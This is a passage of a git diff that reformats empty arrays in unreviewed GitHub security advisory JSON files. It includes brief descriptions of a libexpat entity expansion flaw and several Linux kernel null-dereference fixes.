"affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-vhcg-jff3-96w6/GHSA-vhcg-jff3-96w6.json b/advisories/unreviewed/2022/11/GHSA-vhcg-jff3-96w6/GHSA-vhcg-jff3-96w6.json index 7d7b343f556..fd6f4f895cb 100644 --- a/advisories/unreviewed/2022/11/GHSA-vhcg-jff3-96w6/GHSA-vhcg-jff3-96w6.json +++ b/advisories/unreviewed/2022/11/GHSA-vhcg-jff3-96w6/GHSA-vhcg-jff3-96w6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-vj3m-m56w-wwj4/GHSA-vj3m-m56w-wwj4.json b/advisories/unreviewed/2022/11/GHSA-vj3m-m56w-wwj4/GHSA-vj3m-m56w-wwj4.json index 57f960c4b42..69d9dec1f5b 100644 --- a/advisories/unreviewed/2022/11/GHSA-vj3m-m56w-wwj4/GHSA-vj3m-m56w-wwj4.json +++ b/advisories/unreviewed/2022/11/GHSA-vj3m-m56w-wwj4/GHSA-vj3m-m56w-wwj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-wc94-mpg2-r5mg/GHSA-wc94-mpg2-r5mg.json b/advisories/unreviewed/2022/11/GHSA-wc94-mpg2-r5mg/GHSA-wc94-mpg2-r5mg.json index 82e9caf79a3..49c5de14523 100644 --- a/advisories/unreviewed/2022/11/GHSA-wc94-mpg2-r5mg/GHSA-wc94-mpg2-r5mg.json +++ b/advisories/unreviewed/2022/11/GHSA-wc94-mpg2-r5mg/GHSA-wc94-mpg2-r5mg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-x64r-97x8-7c32/GHSA-x64r-97x8-7c32.json b/advisories/unreviewed/2022/11/GHSA-x64r-97x8-7c32/GHSA-x64r-97x8-7c32.json index 86030a8d537..efa2da85a31 100644 --- a/advisories/unreviewed/2022/11/GHSA-x64r-97x8-7c32/GHSA-x64r-97x8-7c32.json +++ b/advisories/unreviewed/2022/11/GHSA-x64r-97x8-7c32/GHSA-x64r-97x8-7c32.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-xcg6-3xh5-6m77/GHSA-xcg6-3xh5-6m77.json b/advisories/unreviewed/2022/11/GHSA-xcg6-3xh5-6m77/GHSA-xcg6-3xh5-6m77.json index 128f8e58ae4..cf6f678a69d 100644 --- a/advisories/unreviewed/2022/11/GHSA-xcg6-3xh5-6m77/GHSA-xcg6-3xh5-6m77.json +++ b/advisories/unreviewed/2022/11/GHSA-xcg6-3xh5-6m77/GHSA-xcg6-3xh5-6m77.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2qcq-g6cp-qrrg/GHSA-2qcq-g6cp-qrrg.json b/advisories/unreviewed/2022/12/GHSA-2qcq-g6cp-qrrg/GHSA-2qcq-g6cp-qrrg.json index 5711d77e821..9c4ce818723 100644 --- a/advisories/unreviewed/2022/12/GHSA-2qcq-g6cp-qrrg/GHSA-2qcq-g6cp-qrrg.json +++ b/advisories/unreviewed/2022/12/GHSA-2qcq-g6cp-qrrg/GHSA-2qcq-g6cp-qrrg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-2wph-jf27-55c8/GHSA-2wph-jf27-55c8.json b/advisories/unreviewed/2022/12/GHSA-2wph-jf27-55c8/GHSA-2wph-jf27-55c8.json index c35974b635e..69458de776c 100644 --- a/advisories/unreviewed/2022/12/GHSA-2wph-jf27-55c8/GHSA-2wph-jf27-55c8.json +++ b/advisories/unreviewed/2022/12/GHSA-2wph-jf27-55c8/GHSA-2wph-jf27-55c8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-9263-c88f-rf54/GHSA-9263-c88f-rf54.json b/advisories/unreviewed/2022/12/GHSA-9263-c88f-rf54/GHSA-9263-c88f-rf54.json index e3c76efbcae..9f272c65d2a 100644 --- a/advisories/unreviewed/2022/12/GHSA-9263-c88f-rf54/GHSA-9263-c88f-rf54.json +++ b/advisories/unreviewed/2022/12/GHSA-9263-c88f-rf54/GHSA-9263-c88f-rf54.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-p5p4-pp89-v937/GHSA-p5p4-pp89-v937.json b/advisories/unreviewed/2022/12/GHSA-p5p4-pp89-v937/GHSA-p5p4-pp89-v937.json index 6baa8512df2..5ee888b5da9 100644 --- a/advisories/unreviewed/2022/12/GHSA-p5p4-pp89-v937/GHSA-p5p4-pp89-v937.json +++ b/advisories/unreviewed/2022/12/GHSA-p5p4-pp89-v937/GHSA-p5p4-pp89-v937.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/12/GHSA-v233-ch9m-4635/GHSA-v233-ch9m-4635.json b/advisories/unreviewed/2022/12/GHSA-v233-ch9m-4635/GHSA-v233-ch9m-4635.json index be69dacbdf6..5d3628b249e 100644 --- a/advisories/unreviewed/2022/12/GHSA-v233-ch9m-4635/GHSA-v233-ch9m-4635.json +++ b/advisories/unreviewed/2022/12/GHSA-v233-ch9m-4635/GHSA-v233-ch9m-4635.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-r255-vm29-9xg5/GHSA-r255-vm29-9xg5.json b/advisories/unreviewed/2023/03/GHSA-r255-vm29-9xg5/GHSA-r255-vm29-9xg5.json index 0c818bd77a6..027f701bcf0 100644 --- a/advisories/unreviewed/2023/03/GHSA-r255-vm29-9xg5/GHSA-r255-vm29-9xg5.json +++ b/advisories/unreviewed/2023/03/GHSA-r255-vm29-9xg5/GHSA-r255-vm29-9xg5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-237h-73gr-5r5j/GHSA-237h-73gr-5r5j.json b/advisories/unreviewed/2024/01/GHSA-237h-73gr-5r5j/GHSA-237h-73gr-5r5j.json index ac42a1f3a09..340ed05c82b 100644 --- a/advisories/unreviewed/2024/01/GHSA-237h-73gr-5r5j/GHSA-237h-73gr-5r5j.json +++ b/advisories/unreviewed/2024/01/GHSA-237h-73gr-5r5j/GHSA-237h-73gr-5r5j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-44hp-hmpq-cgw3/GHSA-44hp-hmpq-cgw3.json b/advisories/unreviewed/2024/01/GHSA-44hp-hmpq-cgw3/GHSA-44hp-hmpq-cgw3.json index 0d66d22d4b9..5da20bc46f8 100644 --- a/advisories/unreviewed/2024/01/GHSA-44hp-hmpq-cgw3/GHSA-44hp-hmpq-cgw3.json +++ b/advisories/unreviewed/2024/01/GHSA-44hp-hmpq-cgw3/GHSA-44hp-hmpq-cgw3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/01/GHSA-5fh8-mjc7-j7gw/GHSA-5fh8-mjc7-j7gw.json b/advisories/unreviewed/2024/01/GHSA-5fh8-mjc7-j7gw/GHSA-5fh8-mjc7-j7gw.json index f4ed7727572..d421b52cbb3 100644 --- a/advisories/unreviewed/2024/01/GHSA-5fh8-mjc7-j7gw/GHSA-5fh8-mjc7-j7gw.json +++ b/advisories/unreviewed/2024/01/GHSA-5fh8-mjc7-j7gw/GHSA-5fh8-mjc7-j7gw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-5j7f-3j5h-cvq3/GHSA-5j7f-3j5h-cvq3.json b/advisories/unreviewed/2024/01/GHSA-5j7f-3j5h-cvq3/GHSA-5j7f-3j5h-cvq3.json index 02ba549af93..246068522d8 100644 --- a/advisories/unreviewed/2024/01/GHSA-5j7f-3j5h-cvq3/GHSA-5j7f-3j5h-cvq3.json +++ b/advisories/unreviewed/2024/01/GHSA-5j7f-3j5h-cvq3/GHSA-5j7f-3j5h-cvq3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-5w8j-whwf-384q/GHSA-5w8j-whwf-384q.json b/advisories/unreviewed/2024/01/GHSA-5w8j-whwf-384q/GHSA-5w8j-whwf-384q.json index 7e840321818..d0e9ff5cab3 100644 --- a/advisories/unreviewed/2024/01/GHSA-5w8j-whwf-384q/GHSA-5w8j-whwf-384q.json +++ b/advisories/unreviewed/2024/01/GHSA-5w8j-whwf-384q/GHSA-5w8j-whwf-384q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-77gg-pggq-93xh/GHSA-77gg-pggq-93xh.json b/advisories/unreviewed/2024/01/GHSA-77gg-pggq-93xh/GHSA-77gg-pggq-93xh.json index 1f04bd2304d..d40cac147a0 100644 --- a/advisories/unreviewed/2024/01/GHSA-77gg-pggq-93xh/GHSA-77gg-pggq-93xh.json +++ b/advisories/unreviewed/2024/01/GHSA-77gg-pggq-93xh/GHSA-77gg-pggq-93xh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-9qvh-pqr5-q973/GHSA-9qvh-pqr5-q973.json b/advisories/unreviewed/2024/01/GHSA-9qvh-pqr5-q973/GHSA-9qvh-pqr5-q973.json index 46139c620ba..d6f35a16d05 100644 --- a/advisories/unreviewed/2024/01/GHSA-9qvh-pqr5-q973/GHSA-9qvh-pqr5-q973.json +++ b/advisories/unreviewed/2024/01/GHSA-9qvh-pqr5-q973/GHSA-9qvh-pqr5-q973.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-cpc5-3x63-52vq/GHSA-cpc5-3x63-52vq.json b/advisories/unreviewed/2024/01/GHSA-cpc5-3x63-52vq/GHSA-cpc5-3x63-52vq.json index 640ba79cfef..209e8a4b74d 100644 --- a/advisories/unreviewed/2024/01/GHSA-cpc5-3x63-52vq/GHSA-cpc5-3x63-52vq.json +++ b/advisories/unreviewed/2024/01/GHSA-cpc5-3x63-52vq/GHSA-cpc5-3x63-52vq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-g2mp-f56j-3fv9/GHSA-g2mp-f56j-3fv9.json b/advisories/unreviewed/2024/01/GHSA-g2mp-f56j-3fv9/GHSA-g2mp-f56j-3fv9.json index 428ffcdb13f..0be8806be8d 100644 --- a/advisories/unreviewed/2024/01/GHSA-g2mp-f56j-3fv9/GHSA-g2mp-f56j-3fv9.json +++ b/advisories/unreviewed/2024/01/GHSA-g2mp-f56j-3fv9/GHSA-g2mp-f56j-3fv9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-qmfw-q6m7-ff6j/GHSA-qmfw-q6m7-ff6j.json b/advisories/unreviewed/2024/01/GHSA-qmfw-q6m7-ff6j/GHSA-qmfw-q6m7-ff6j.json index 141df2ce189..b7650b8adb9 100644 --- a/advisories/unreviewed/2024/01/GHSA-qmfw-q6m7-ff6j/GHSA-qmfw-q6m7-ff6j.json +++ b/advisories/unreviewed/2024/01/GHSA-qmfw-q6m7-ff6j/GHSA-qmfw-q6m7-ff6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-qvp3-5pch-7m77/GHSA-qvp3-5pch-7m77.json b/advisories/unreviewed/2024/01/GHSA-qvp3-5pch-7m77/GHSA-qvp3-5pch-7m77.json index 70437822ec4..aa4482109f5 100644 --- a/advisories/unreviewed/2024/01/GHSA-qvp3-5pch-7m77/GHSA-qvp3-5pch-7m77.json +++ b/advisories/unreviewed/2024/01/GHSA-qvp3-5pch-7m77/GHSA-qvp3-5pch-7m77.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-ww4w-c262-2rmf/GHSA-ww4w-c262-2rmf.json b/advisories/unreviewed/2024/01/GHSA-ww4w-c262-2rmf/GHSA-ww4w-c262-2rmf.json index 7db58c6fe63..aa64a7bfffd 100644 --- a/advisories/unreviewed/2024/01/GHSA-ww4w-c262-2rmf/GHSA-ww4w-c262-2rmf.json +++ b/advisories/unreviewed/2024/01/GHSA-ww4w-c262-2rmf/GHSA-ww4w-c262-2rmf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/01/GHSA-xqfv-g7r7-7v7j/GHSA-xqfv-g7r7-7v7j.json b/advisories/unreviewed/2024/01/GHSA-xqfv-g7r7-7v7j/GHSA-xqfv-g7r7-7v7j.json index 97003077dfe..1fcefa848b5 100644 --- a/advisories/unreviewed/2024/01/GHSA-xqfv-g7r7-7v7j/GHSA-xqfv-g7r7-7v7j.json +++ b/advisories/unreviewed/2024/01/GHSA-xqfv-g7r7-7v7j/GHSA-xqfv-g7r7-7v7j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-ch5v-h69f-mxc8/GHSA-ch5v-h69f-mxc8.json b/advisories/unreviewed/2024/03/GHSA-ch5v-h69f-mxc8/GHSA-ch5v-h69f-mxc8.json index 8586a795b47..6d30a8972f8 100644 --- a/advisories/unreviewed/2024/03/GHSA-ch5v-h69f-mxc8/GHSA-ch5v-h69f-mxc8.json +++ b/advisories/unreviewed/2024/03/GHSA-ch5v-h69f-mxc8/GHSA-ch5v-h69f-mxc8.json @@ -7,12 +7,8 @@ "CVE-2024-28757" ], "details": "libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-cgh4-cqjh-hrvx/GHSA-cgh4-cqjh-hrvx.json b/advisories/unreviewed/2024/05/GHSA-cgh4-cqjh-hrvx/GHSA-cgh4-cqjh-hrvx.json index af0b11e1930..51be5af76b7 100644 --- a/advisories/unreviewed/2024/05/GHSA-cgh4-cqjh-hrvx/GHSA-cgh4-cqjh-hrvx.json +++ b/advisories/unreviewed/2024/05/GHSA-cgh4-cqjh-hrvx/GHSA-cgh4-cqjh-hrvx.json @@ -7,12 +7,8 @@ "CVE-2023-52648" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vmwgfx: Unmap the surface before resetting it on a plane state\n\nSwitch to a new plane state requires unreferencing of all held surfaces.\nIn the work required for mob cursors the mapped surfaces started being\ncached but the variable indicating whether the surface is currently\nmapped was not being reset. This leads to crashes as the duplicated\nstate, incorrectly, indicates the that surface is mapped even when\nno surface is present. That's because after unreferencing the surface\nit's perfectly possible for the plane to be backed by a bo instead of a\nsurface.\n\nReset the surface mapped flag when unreferencing the plane state surface\nto fix null derefs in cleanup. Fixes crashes in KDE KWin 6.0 on Wayland:\n\nOops: 0000 [#1] PREEMPT SMP PTI\nCPU: 4 PID: 2533 Comm: kwin_wayland Not tainted 6.7.0-rc3-vmwgfx #2\nHardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020\nRIP: 0010:vmw_du_cursor_plane_cleanup_fb+0x124/0x140 [vmwgfx]\nCode: 00 00 00 75 3a 48 83 c4 10 5b 5d c3 cc cc cc cc 48 8b b3 a8 00 00 00 48 c7 c7 99 90 43 c0 e8 93 c5 db ca 48 8b 83 a8 00 00 00 <48> 8b 78 28 e8 e3 f>\nRSP: 0018:ffffb6b98216fa80 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff969d84cdcb00 RCX: 0000000000000027\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff969e75f21600\nRBP: ffff969d4143dc50 R08: 0000000000000000 R09: ffffb6b98216f920\nR10: 0000000000000003 R11: ffff969e7feb3b10 R12: 0000000000000000\nR13: 0000000000000000 R14: 000000000000027b R15: ffff969d49c9fc00\nFS: 00007f1e8f1b4180(0000) GS:ffff969e75f00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000028 CR3: 0000000104006004 CR4: 00000000003706f0\nCall Trace:\n \n ? __die+0x23/0x70\n ? page_fault_oops+0x171/0x4e0\n ? exc_page_fault+0x7f/0x180\n ? asm_exc_page_fault+0x26/0x30\n ? vmw_du_cursor_plane_cleanup_fb+0x124/0x140 [vmwgfx]\n drm_atomic_helper_cleanup_planes+0x9b/0xc0\n commit_tail+0xd1/0x130\n drm_atomic_helper_commit+0x11a/0x140\n drm_atomic_commit+0x97/0xd0\n ? __pfx___drm_printfn_info+0x10/0x10\n drm_atomic_helper_update_plane+0xf5/0x160\n drm_mode_cursor_universal+0x10e/0x270\n drm_mode_cursor_common+0x102/0x230\n ? __pfx_drm_mode_cursor2_ioctl+0x10/0x10\n drm_ioctl_kernel+0xb2/0x110\n drm_ioctl+0x26d/0x4b0\n ? __pfx_drm_mode_cursor2_ioctl+0x10/0x10\n ? __pfx_drm_ioctl+0x10/0x10\n vmw_generic_ioctl+0xa4/0x110 [vmwgfx]\n __x64_sys_ioctl+0x94/0xd0\n do_syscall_64+0x61/0xe0\n ? __x64_sys_ioctl+0xaf/0xd0\n ? syscall_exit_to_user_mode+0x2b/0x40\n ? do_syscall_64+0x70/0xe0\n ? __x64_sys_ioctl+0xaf/0xd0\n ? syscall_exit_to_user_mode+0x2b/0x40\n ? do_syscall_64+0x70/0xe0\n ? exc_page_fault+0x7f/0x180\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\nRIP: 0033:0x7f1e93f279ed\nCode: 04 25 28 00 00 00 48 89 45 c8 31 c0 48 8d 45 10 c7 45 b0 10 00 00 00 48 89 45 b8 48 8d 45 d0 48 89 45 c0 b8 10 00 00 00 0f 05 <89> c2 3d 00 f0 ff f>\nRSP: 002b:00007ffca0faf600 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 000055db876ed2c0 RCX: 00007f1e93f279ed\nRDX: 00007ffca0faf6c0 RSI: 00000000c02464bb RDI: 0000000000000015\nRBP: 00007ffca0faf650 R08: 000055db87184010 R09: 0000000000000007\nR10: 000055db886471a0 R11: 0000000000000246 R12: 00007ffca0faf6c0\nR13: 00000000c02464bb R14: 0000000000000015 R15: 00007ffca0faf790\n \nModules linked in: snd_seq_dummy snd_hrtimer nf_conntrack_netbios_ns nf_conntrack_broadcast nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_ine>\nCR2: 0000000000000028\n---[ end trace 0000000000000000 ]---\nRIP: 0010:vmw_du_cursor_plane_cleanup_fb+0x124/0x140 [vmwgfx]\nCode: 00 00 00 75 3a 48 83 c4 10 5b 5d c3 cc cc cc cc 48 8b b3 a8 00 00 00 48 c7 c7 99 90 43 c0 e8 93 c5 db ca 48 8b 83 a8 00 00 00 <48> 8b 78 28 e8 e3 f>\nRSP: 0018:ffffb6b98216fa80 EFLAGS: 00010246\nRAX: 0000000000000000 RBX: ffff969d84cdcb00 RCX: 0000000000000027\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff969e75f21600\nRBP: ffff969d4143\n---truncated---", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-f9rf-c3r2-696q/GHSA-f9rf-c3r2-696q.json b/advisories/unreviewed/2024/05/GHSA-f9rf-c3r2-696q/GHSA-f9rf-c3r2-696q.json index 64c936d6fca..1cb283c7972 100644 --- a/advisories/unreviewed/2024/05/GHSA-f9rf-c3r2-696q/GHSA-f9rf-c3r2-696q.json +++ b/advisories/unreviewed/2024/05/GHSA-f9rf-c3r2-696q/GHSA-f9rf-c3r2-696q.json @@ -7,12 +7,8 @@ "CVE-2023-52647" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: nxp: imx8-isi: Check whether crossbar pad is non-NULL before access\n\nWhen translating source to sink streams in the crossbar subdev, the\ndriver tries to locate the remote subdev connected to the sink pad. The\nremote pad may be NULL, if userspace tries to enable a stream that ends\nat an unconnected crossbar sink. When that occurs, the driver\ndereferences the NULL pad, leading to a crash.\n\nPrevent the crash by checking if the pad is NULL before using it, and\nreturn an error if it is.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-m2jr-hqxr-7x3f/GHSA-m2jr-hqxr-7x3f.json b/advisories/unreviewed/2024/05/GHSA-m2jr-hqxr-7x3f/GHSA-m2jr-hqxr-7x3f.json index b38cb2c7056..7e8106093e5 100644 --- a/advisories/unreviewed/2024/05/GHSA-m2jr-hqxr-7x3f/GHSA-m2jr-hqxr-7x3f.json +++ b/advisories/unreviewed/2024/05/GHSA-m2jr-hqxr-7x3f/GHSA-m2jr-hqxr-7x3f.json @@ -7,12 +7,8 @@ "CVE-2024-26943" ], "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnouveau/dmem: handle kcalloc() allocation failure\n\nThe kcalloc() in nouveau_dmem_evict_chunk() will return null if\nthe physical memory has run out. As a result, if we dereference\nsrc_pfns, dst_pfns or dma_addrs, the null pointer dereference bugs\nwill happen.\n\nMoreover, the GPU is going away. If the kcalloc() fails, we could not\nevict all pages mapping a chunk. So this patch adds a __GFP_NOFAIL\nflag in kcalloc().\n\nFinally, as there is no need to have physically contiguous memory,\nthis patch switches kcalloc() to kvcalloc() in order to avoid\nfailing allocations.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/08/GHSA-2wqr-vwcq-3xp4/GHSA-2wqr-vwcq-3xp4.json b/advisories/unreviewed/2024/08/GHSA-2wqr-vwcq-3xp4/GHSA-2wqr-vwcq-3xp4.json index bbaa55f076f..fe0f0612859 100644 --- a/advisories/unreviewed/2024/08/GHSA-2wqr-vwcq-3xp4/GHSA-2wqr-vwcq-3xp4.json +++ b/advisories/unreviewed/2024/08/GHSA-2wqr-vwcq-3xp4/GHSA-2wqr-vwcq-3xp4.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-5fw8-xf44-fpcj/GHSA-5fw8-xf44-fpcj.json b/advisories/unreviewed/2024/08/GHSA-5fw8-xf44-fpcj/GHSA-5fw8-xf44-fpcj.json index 3a4d593d0a2..04eeec1d772 100644 --- a/advisories/unreviewed/2024/08/GHSA-5fw8-xf44-fpcj/GHSA-5fw8-xf44-fpcj.json +++ b/advisories/unreviewed/2024/08/GHSA-5fw8-xf44-fpcj/GHSA-5fw8-xf44-fpcj.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/08/GHSA-5vxw-hpgc-992j/GHSA-5vxw-hpgc-992j.json b/advisories/unreviewed/2024/08/GHSA-5vxw-hpgc-992j/GHSA-5vxw-hpgc-992j.json index 57ca7579c74..79162c8bf86 100644 --- a/advisories/unreviewed/2024/08/GHSA-5vxw-hpgc-992j/GHSA-5vxw-hpgc-992j.json +++ b/advisories/unreviewed/2024/08/GHSA-5vxw-hpgc-992j/GHSA-5vxw-hpgc-992j.json @@ -13,9 +13,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 